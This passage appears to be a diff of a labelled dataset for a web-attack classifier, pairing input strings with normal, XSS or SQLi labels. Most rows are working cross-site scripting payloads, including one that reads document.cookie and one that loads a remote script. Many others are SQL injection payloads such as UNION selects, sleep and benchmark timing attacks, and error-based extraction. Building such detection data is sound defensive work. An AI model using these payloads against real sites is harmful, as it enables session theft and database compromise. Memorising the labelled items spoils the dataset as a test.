onbeforecopy=""alert(1)"" contenteditable>test</label>",1,XSS,2301 -"1%"" ) ) and 7358 = 6986--",2,SQLi,19908 -or 'something' = 'some'+'thing',2,SQLi,11181 -"<div draggable=""true"" contenteditable>drag me</div><noembed ondragover=alert(1) contenteditable>drop here</noembed>",1,XSS,7655 -"1"" ) ) as knyf where 8109 = 8109 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,21846 -1'+ ( select qdon where 9453 = 9453,2,SQLi,12843 --7021' or 3038 = 3038,2,SQLi,13277 -"<div draggable=""true"" contenteditable>drag me</div><li ondragover=alert(1) contenteditable>drop here</li>",1,XSS,5941 -"xss""><!--><svg/onload=alert(document.domain)>",1,XSS,9876 -"<base onbeforecut=""alert(1)"" contenteditable>test</base>",1,XSS,6601 -"{""id"":null,""name"":""rest""}",0,normal,25279 -"<IMG SRC=x onpopstate=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1136 -"1'|| ( select 'mwmn' where 5112 = 5112 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) ||'",2,SQLi,13231 -<template onpointerover=alert(1)>XSS</template>,1,XSS,2529 -ORDER BY SLEEP(5),2,SQLi,10435 -Create a stunning sculpture from clay.,0,normal,23175 -"<table onmousedown=""alert(1)"">test</table>",1,XSS,3079 -"<basefont draggable=""true"" ondragenter=""alert(1)"">test</basefont>",1,XSS,2239 -"<template draggable=""true"" ondragenter=""alert(1)"">test</template>",1,XSS,5801 -"{""id"":null,""name"":""sat knew""}",0,normal,25816 -"1' in boolean mode ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #",2,SQLi,21514 -1'|| ( select 'allj' where 7334 = 7334,2,SQLi,16840 -"<div id=""84""><x xmlns:ev=""http://www.w3.org/2001/xml-events"" ev:event=""load"" ev:handler=""javascript:alert(84)//#x""/>//[""'`-->]]>]</div><div id=""85""><x xmlns:ev=""http://www.w3.org/2001/xml-events"" ev:event=""load"" ev:handler=""test.evt#x""/>//[""'`-->]]>]</div><div id=""86""><body oninput=alert(86)><input autofocus>//[""'`-->]]>]</div>",1,XSS,9133 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17",2,SQLi,10552 -"1"" where 8727 = 8727",2,SQLi,12589 -and sleep 5,2,SQLi,11230 -"1 and make_set ( 9542 = 8888,8888 ) -- idkn",2,SQLi,20376 -Select the right solution for the challenge.,0,normal,24403 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#",2,SQLi,10846 -<img id=x tabindex=1 onfocusin=alert(1)></img>,1,XSS,7709 -"select * from users where id = 1 or \< = 1 union select 1,@@VERSION -- 1",2,SQLi,11636 -"iif ( 3548 = 8646,1,1/0 )",2,SQLi,19391 -1%' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and '%' = ',2,SQLi,17206 -alert&#x28;1&#x29,1,XSS,9361 -"1%"" ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,15283 -( select ( case when ( 9066 = 5598 ) then 1 else 9066* ( select 9066 from information_schema.character_sets ) end ) ),2,SQLi,20382 -<svg id=x tabindex=1 ondeactivate=alert(1)></svg><input id=y autofocus>,1,XSS,4204 -"1"" where 1115 = 1115 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,22229 -<select onpointerup=alert(1)>XSS</select>,1,XSS,3582 -1' ) and ( 3020 = 3020 ) *6703 and ( 'lhfa' = 'lhfa,2,SQLi,22009 -<aside onpointerenter=alert(1)>XSS</aside>,1,XSS,7407 -1' ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,20405 --1940 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ),2,SQLi,19440 -"-6198"" ) or make_set ( 3602 = 2178,2178 ) and ( ""xksq"" like ""xksq",2,SQLi,21440 -"1' ) ) as rxhe where 3838 = 3838 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,14225 -"-9451%"" ) union all select 9963,9963,9963--",2,SQLi,19002 -"<img SRC="" &#14; javascript:document.vulnerable=true;"">",1,XSS,1423 -<img src=foo.png onerror=alert(/xssed/) />,1,XSS,1232 -"<object type=""text/x-scriptlet"" data=""http://jsfiddle.net/XLE63/ ""></object>",1,XSS,853 -<script id=x tabindex=1 onbeforedeactivate=alert(1)></script><input autofocus>,1,XSS,5095 -1'+ ( select 'tjvt' where 2463 = 2463,2,SQLi,18286 -"1%' union all select null,null,null,null,null--",2,SQLi,14875 -"<style>@keyframes slidein {}</style><frameset style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></frameset>",1,XSS,8240 -"-6305"" ) ) ) or 8097 = 2048 and ( ( ( ""euyy"" like ""euyy",2,SQLi,16063 -substring,0,normal,23376 -<header id=x tabindex=1 onbeforeactivate=alert(1)></header>,1,XSS,8857 -"<blink onmouseout=""alert(1)"">test</blink>",1,XSS,4660 -Select lounge.,0,normal,24724 -"<code onmouseover=""alert(1)"">test</code>",1,XSS,8529 -"{""id"":null,""firstName"":""Damien"",""lastName"":""Gareth"",""address"":"" Inflight Catering Centre 55 Airport Boulevard #6"",""city"":""430"",""telephone"":""6020428847""}",0,normal,25702 -"{""id"":null,""name"":""Patrat""}",0,normal,25373 -"<video onbeforecut=""alert(1)"" contenteditable>test</video>",1,XSS,7682 -1' where 9544 = 9544,2,SQLi,20394 -Select your dream project.,0,normal,24519 -"1%"" ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,18458 -"1"" where 8918 = 8918 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,14524 -"-9661"" ) ) ) union all select 2158,2158,2158--",2,SQLi,14848 -1 ) where 5025 = 5025,2,SQLi,18071 -"<rt draggable=""true"" ondrag=""alert(1)"">test</rt>",1,XSS,7069 -"1'|| ( select 'hdpi' where 5620 = 5620 and make_set ( 8403 = 8403,8899 ) ) ||'",2,SQLi,15559 -"-7637"" union all select 8498,8498,8498--",2,SQLi,20058 -<meta onpointermove=alert(1)>XSS</meta>,1,XSS,4829 -"select count ( * ) from generate_series ( 1,5000000 ) and ( '%' = '",2,SQLi,21938 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--",2,SQLi,10729 -1'|| ( select 'mosp' where 6085 = 6085,2,SQLi,16336 -"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3# sfup",2,SQLi,18501 -"`'><script>\xE2\x80\x86javascript:alert(1)</script> -`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>",1,XSS,551 -AS INJECTX WHERE 1=1 AND 1=1,2,SQLi,10266 -"-5027%"" ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""%"" = """,2,SQLi,18759 -"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">",1,XSS,275 -1 and 8398 = 1891-- naov,2,SQLi,19668 -1) or sleep(__TIME__)#,2,SQLi,10879 -"<script>d.innerHTML+='';</script>//[""'`-->]]>]</div>",1,XSS,9277 -Update your status message.,0,normal,22898 -"1"" where 9172 = 9172 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,19886 -"1%"" ) ) ) union all select null--",2,SQLi,20627 -"<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>",1,XSS,9177 --4684 ) as uqjn where 4550 = 4550 or 1689 = 5825,2,SQLi,14940 -"1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and 'kird' = 'kird",2,SQLi,13637 -"1' ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( 'jhle' like 'jhle",2,SQLi,14002 -"<body oncontextmenu=""alert(1)"">test</body>",1,XSS,8816 -"1"" ) where 1001 = 1001 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12953 -"<plaintext onbeforecut=""alert(1)"" contenteditable>test</plaintext>",1,XSS,2066 -"1'|| ( select 'scqw' where 3337 = 3337 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,19385 -"1 ) and elt ( 4249 = 4249,7259 ) and ( 8226 = 8226",2,SQLi,15509 -"?callback=javascript:alert(1)"",",1,XSS,9929 -"<rtc onpaste=""alert(1)"" contenteditable>test</rtc>",1,XSS,8165 -"1%"" ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,14933 -"{""id"":null,""name"":""Affenpinscher""}",0,normal,25626 -"<style>:target {color:red;}</style><menuitem id=x style=""transition:color 1s"" ontransitionend=alert(1)></menuitem>",1,XSS,3673 -"1' ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'nopu' = 'nopu",2,SQLi,14224 -"-3963"" or 1224 = 5119",2,SQLi,16308 -"1%"" and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,12406 -"1 ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( 9558 = 9558",2,SQLi,12727 -"<style>:target {transform: rotate(180deg);}</style><details id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></details>",1,XSS,4221 -"1' and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'dphz' = 'dphz",2,SQLi,17209 -"1' and make_set ( 9860 = 6956,6956 ) and 'toru' = 'toru",2,SQLi,22534 -"{""id"":null,""name"":""Steller’s Sea Cow""}",0,normal,25758 -"<style>:target {color:red;}</style><q id=x style=""transition:color 1s"" ontransitionend=alert(1)></q>",1,XSS,8811 -select case when 7649 = 9297 then 1 else null end--,2,SQLi,14728 -"-7482"" ) ) ) or 9077 = 2651",2,SQLi,18409 -"-9011"" ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,12362 -"1%"" order by 1--",2,SQLi,22588 -"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( 'jutx' = 'jutx",2,SQLi,17266 -"1' ) ) as gqzy where 2312 = 2312 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20782 -"<iframe src=""""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>",1,XSS,9775 -<h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1>,1,XSS,8888 -"{""id"":null,""firstName"":""Jeff"",""lastName"":""Lam Tian Hung"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25405 -"<video onmouseover=""alert(1)"">test</video>",1,XSS,5800 -"1"" ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ""zzkc"" = ""zzkc",2,SQLi,22536 -"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( 'xaoi' = 'xaoi",2,SQLi,14546 -"1' ) as uqkz where 8482 = 8482 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15178 -"1%"" ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""%"" = """,2,SQLi,15380 -"<style>:target {transform: rotate(180deg);}</style><output id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></output>",1,XSS,4485 -"<kbd onbeforepaste=""alert(1)"" contenteditable>test</kbd>",1,XSS,4795 -"<style>:target {color: red;}</style><map id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></map>",1,XSS,2874 -<video poster=javascript:javascript:alert(1)//,1,XSS,576 -"<div draggable=""true"" contenteditable>drag me</div><link ondrop=alert(1) contenteditable>drop here</link>",1,XSS,5116 -"<section onmousedown=""alert(1)"">test</section>",1,XSS,3796 -Select aim.,0,normal,24847 -commit,0,normal,23348 -"<style>@keyframes x{}</style><pre style=""animation-name:x"" onanimationend=""alert(1)""></pre>",1,XSS,3634 -"<marquee onmousemove=""alert(1)"">test</marquee>",1,XSS,8517 -"<em onkeypress=""alert(1)"" contenteditable>test</em>",1,XSS,2665 -"1'|| ( select 'epjf' from dual where 8584 = 8584 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12779 -‘)alert(1);//,1,XSS,879 -&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,1340 -"<output onmousedown=""alert(1)"">test</output>",1,XSS,7793 -) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,11254 -"1' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( 'bemh' = 'bemh",2,SQLi,21990 -"1 ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) )",2,SQLi,17010 -"1 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) # cgow",2,SQLi,22555 -Select next.,0,normal,24669 -"<nextid oncopy=""alert(1)"" contenteditable>test</nextid>",1,XSS,8787 -<video onpointerout=alert(1)>XSS</video>,1,XSS,2415 -&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;,1,XSS,1367 -"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out",1,XSS,244 -"select * from users where id = 1 or ( $+ ) = 1 union select 1,@@VERSION -- 1",2,SQLi,11893 -<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?,1,XSS,796 -"<embed oncopy=""alert(1)"" contenteditable>test</embed>",1,XSS,5533 -1 ) and 3861 = 5813--,2,SQLi,19279 -"1"" where 1618 = 1618 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,22157 -<style onpointerout=alert(1)>XSS</style>,1,XSS,2706 -Create a memorable moment.,0,normal,22781 -"select * from users where id = 1 or "", ( "" or 1 = 1 -- 1",2,SQLi,11577 -"<img src\x32=x onerror=""javascript:alert(1)"">",1,XSS,623 -"{""id"":null,""firstName"":""Steven"",""lastName"":""Koh"",""address"":""20 Parry View"",""city"":""824"",""telephone"":""1309787313""}",0,normal,25614 -1 where 8095 = 8095,2,SQLi,15217 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""%"" = """,2,SQLi,21391 -"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""xxug"" = ""xxug",2,SQLi,19254 -"1 where 3478 = 3478 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,13176 -"1' ) as knxr where 5662 = 5662 union all select null,null,null,null,null,null,null,null#",2,SQLi,12537 -"1 and make_set ( 8403 = 8403,8899 )",2,SQLi,14995 -"1'|| ( select 'xbvz' from dual where 1632 = 1632 union all select null,null,null,null,null,null,null,null--",2,SQLi,16981 -"<rb onmouseleave=""alert(1)"">test</rb>",1,XSS,2091 -Where's the table stored?,0,normal,23570 -<// style=x:expression\28javascript:alert(1)\29>,1,XSS,658 -"select * from users where id = '1' or @ @1 = 1 union select 1,version ( ) -- 1'",2,SQLi,11447 -&&SLEEP(5)--,2,SQLi,10431 -"<! '=""foo""><x foo='><img src=x onerror=alert(2)//'>",1,XSS,8980 -"<link oncut=""alert(1)"" contenteditable>test</link>",1,XSS,3652 -"<% foo><x foo=""%><script>alert(123)</script>"">",1,XSS,922 -<style onpointerdown=alert(1)>XSS</style>,1,XSS,8404 -1 where 1519 = 1519,2,SQLi,17898 -Select a quote to live by.,0,normal,24418 -"1' ) where 9091 = 9091 union all select null,null,null,null#",2,SQLi,19275 -"1 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,20579 -1%' ) and 2006 = 2006,2,SQLi,20080 -"`'><script>\xE2\x80\x8Ajavascript:alert(513)</script> -`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>",1,XSS,8953 -"<style>@keyframes slidein {}</style><embed style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></embed>",1,XSS,8729 -"1%' ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( '%' = '",2,SQLi,14593 -<progress onpointerover=alert(1)>XSS</progress>,1,XSS,5486 --3100' ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 'etuj' like 'etuj,2,SQLi,12454 -"-9958"" ) as jzvq where 3741 = 3741 union all select 3741,3741,3741#",2,SQLi,12640 -"javascript:/*""/*'/*\""/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script --><<script>alert()<</script>\ /**/alert()//",1,XSS,9546 -"<style>:target {transform: rotate(180deg);}</style><cite id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></cite>",1,XSS,7304 -Select your fashion.,0,normal,25070 -"1 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) # myqr",2,SQLi,16574 -Select go.,0,normal,24816 -"<rt oncut=""alert(1)"" contenteditable>test</rt>",1,XSS,6330 -Select your determine.,0,normal,25182 -<svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s>,1,XSS,2931 -"and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));",2,SQLi,11195 -<big id=x tabindex=1 onactivate=alert(1)></big>,1,XSS,4206 -waitfor delay '0:0:5' and ( ( ( 'ywnm' = 'ywnm,2,SQLi,18515 -<image onpointerdown=alert(1)>XSS</image>,1,XSS,8248 -"1%"" or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12218 -"`'><script>\xE2\x80\x88javascript:alert(1)</script> -`'><script>\xE2\x80\x89javascript:alert(1)</script>",1,XSS,9596 -"1 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) -- lxey",2,SQLi,20036 -Select carry.,0,normal,24934 -"1, ( select ( case when ( 5154 = 5154 ) then 1 else 5154* ( select 5154 from master..sysdatabases ) end ) )",2,SQLi,18851 -"1' ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 'ykoz' = 'ykoz",2,SQLi,17559 -"<style>@keyframes x{}</style><th style=""animation-name:x"" onanimationend=""alert(1)""></th>",1,XSS,4286 -"-8245"" ) ) or 3038 = 3038",2,SQLi,20007 -"<div draggable=""true"" contenteditable>drag me</div><acronym ondragover=alert(1) contenteditable>drop here</acronym>",1,XSS,2118 -<marquee onpointerleave=alert(1)>XSS</marquee>,1,XSS,5999 -"<colgroup onmouseup=""alert(1)"">test</colgroup>",1,XSS,8031 -1 where 6827 = 6827,2,SQLi,15038 -select ( case when ( 9246 = 6326 ) then 9246 else 9246* ( select 9246 from mysql.db ) end ) #,2,SQLi,16455 -"waitfor delay '0:0:5' and ( ""dmcu"" = ""dmcu",2,SQLi,22346 -<s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus>,1,XSS,3049 -"<rp onbeforecut=""alert(1)"" contenteditable>test</rp>",1,XSS,3560 -"<IMG SRC=x onblur=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1140 -Select your hope.,0,normal,25119 -<th onpointerleave=alert(1)>XSS</th>,1,XSS,2783 -"<div draggable=""true"" contenteditable>drag me</div><p ondrop=alert(1) contenteditable>drop here</p>",1,XSS,4319 -"1' ) as rqzz where 4987 = 4987 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,13080 -1 ) ) as kccx where 7547 = 7547 union all select null--,2,SQLi,16864 -"1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ""mynm"" like ""mynm",2,SQLi,20730 -"1 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,19264 -<pre onblur=alert(1) tabindex=1 id=x></pre><input autofocus>,1,XSS,5901 -"<div onclick=""alert(1)"">test</div>",1,XSS,5122 -"-1583' ) or elt ( 1032 = 1032,3623 ) and ( 'jrcj' like 'jrcj",2,SQLi,17647 -1' ) where 5307 = 5307,2,SQLi,17124 -select sleep ( 5 ) and 'hhrw' like 'hhrw,2,SQLi,21260 -"1' ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( 'asdc' like 'asdc",2,SQLi,13102 -Select the ideal gift for a loved one.,0,normal,24232 -Select a quote to share on social media.,0,normal,24378 +") ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11996 +"1%"" union all select null,null,null,null,null,null,null,null,null--",2,SQLi,18720 +"<map onkeypress=""alert(1)"" contenteditable>test</map>",1,XSS,7915 +"Go to the Start menu, open Settings and select System.",0,normal,26094 +"1 ) ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,17892 +<h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus>,1,XSS,4353 +"1'|| ( select 'zbdv' where 1618 = 1618 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) ||'",2,SQLi,16225 +"<plaintext draggable=""true"" ondragstart=""alert(1)"">test</plaintext>",1,XSS,2306 +"-3756' ) union all select 1034,1034,1034--",2,SQLi,13595 +"1 ) ) as nxdf where 1696 = 1696 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,12491 +Select disapprove.,0,normal,24540 +"<embed oncopy=""alert(1)"" contenteditable>test</embed>",1,XSS,5514 +"-6200' ) ) as jjpz where 4490 = 4490 union all select 4490,4490,4490,4490,4490,4490,4490,4490,4490,4490--",2,SQLi,18251 +Update your wardrobe style.,0,normal,22967 +"1%"" ) ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( ""%"" = """,2,SQLi,15319 +<noframes onpointerdown=alert(1)>XSS</noframes>,1,XSS,6301 +"1"" ) as rnjx where 2679 = 2679 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,12397 +<param id=x tabindex=1 onfocus=alert(1)></param>,1,XSS,6288 "<IMG SRC=x ontoggle=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1195 -"<template onkeypress=""alert(1)"" contenteditable>test</template>",1,XSS,2376 -"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337",2,SQLi,11362 -"<strike onmouseover=""alert(1)"">test</strike>",1,XSS,8319 -"{""id"":null,""name"":""Coredramon (Blue)""}",0,normal,25416 -"<spacer onkeypress=""alert(1)"" contenteditable>test</spacer>",1,XSS,1698 -select case when 4656 = 3716 then 1 else null end--,2,SQLi,20531 -"-6389"" union all select 2355,2355,2355,2355,2355--",2,SQLi,14068 -Where's the best place to capture the sunset?,0,normal,24115 -"<<SCRIPT>alert(""XSS"");//\<</SCRIPT>",1,XSS,249 -"-9934"" ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""xecb"" like ""xecb",2,SQLi,12989 -"iif ( 6369 = 5881,1,1/0 )",2,SQLi,19929 -"1"" where 4183 = 4183 union all select null,null,null,null,null,null--",2,SQLi,16505 -Select the right lens for the shot.,0,normal,24292 -"<div draggable=""true"" contenteditable>drag me</div><em ondrop=alert(1) contenteditable>drop here</em>",1,XSS,5515 -<marquee id=x tabindex=1 onfocusin=alert(1)></marquee>,1,XSS,6563 -"select sleep ( 5 ) and ( ""%"" = """,2,SQLi,13709 -1 where 8532 = 8532,2,SQLi,22030 -"<rtc draggable=""true"" ondragleave=""alert(1)"">test</rtc>",1,XSS,1704 -<param onblur=alert(1) tabindex=1 id=x></param><input autofocus>,1,XSS,6129 -<video onpointerup=alert(1)>XSS</video>,1,XSS,7756 -"1"" ) ) as ikuz where 7385 = 7385",2,SQLi,20667 -Retrieve data where applicable.,0,normal,23526 -"( select 1 from generate_series ( 9352,9352,case when ( 9352 = 9352 ) then 1 else 0 end ) limit 1 )",2,SQLi,14452 -1%' ) ),2,SQLi,21880 -"<blockquote onmousedown=""alert(1)"">test</blockquote>",1,XSS,8044 -"1%"" ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ""%"" = """,2,SQLi,21563 -"1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and 'raru' = 'raru",2,SQLi,17108 -"1'+ ( select 'nhlx' where 2291 = 2291 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from 